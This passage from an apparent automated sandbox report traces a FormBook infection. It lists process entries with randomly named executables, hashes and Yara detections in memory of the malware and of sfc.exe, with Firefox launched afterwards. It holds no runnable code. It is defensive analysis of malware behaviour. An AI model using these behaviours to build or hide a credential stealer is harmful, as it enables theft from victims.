                                                            Path:C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe"
                                                            Imagebase:0xc00000
                                                            File size:143'872 bytes
                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:03:02:58
                                                            Start date:01/04/2025
                                                            Path:C:\Windows\SysWOW64\sfc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                            Imagebase:0x280000
                                                            File size:40'448 bytes
                                                            MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                            Target ID:11
                                                            Start time:03:03:10
                                                            Start date:01/04/2025
                                                            Path:C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe"
                                                            Imagebase:0xc00000
                                                            File size:143'872 bytes
                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:03:03:22
                                                            Start date:01/04/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff76aab0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            No disassembly